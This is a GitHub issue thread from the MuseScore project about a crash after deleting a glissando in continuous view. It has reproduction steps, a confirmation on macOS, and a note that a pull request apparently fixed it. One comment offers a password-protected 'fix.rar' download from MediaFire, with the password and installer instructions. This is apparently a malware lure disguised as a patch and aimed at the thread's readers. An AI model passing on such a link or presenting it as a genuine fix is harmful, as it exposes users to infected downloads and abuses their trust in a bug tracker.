### ISSUE TITLE
Crash after deleting glissando in continuous view

### ISSUE THREAD

**Issue by mercuree** [musescore/MuseScore#24212]
### Issue type

Crash or freeze

### Description with steps to reproduce

1. Create empty score
2. **Switch to continuous view (horizontal)**
3. Add two notes
4. Add glissando to them
5. Undo (CTRL + Z)
6. Add glissando again
7. Delete glissando
8. Crash

This issue is based on this [report](https://musescore.org/en/node/367433) and [this](https://musescore.org/sites/musescore.org/files/2024-08/Beautiful%20Things%20%E2%80%93%20Benson%20Boone.mscz) score.
The user also reports about crash after changing ties, but I could not reproduce it

### Supporting files, videos and screenshots

https://github.com/user-attachments/assets/9fe731c4-28e8-4296-b16b-f0c054518838

### What is the latest version of MuseScore Studio where this issue is present?

MuseScore 4.5.0 nightly, MuseScore 4.4.0 RC

### Regression

Yes, this works in the latest released version and is broken in the nightly builds

### Operating system

windows 10

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkunda** [comment]
Verified on macOS.

**Comment by mercuree** [comment]
Probably fixed by #24218 
Can't reproduce anymore with that build on windows
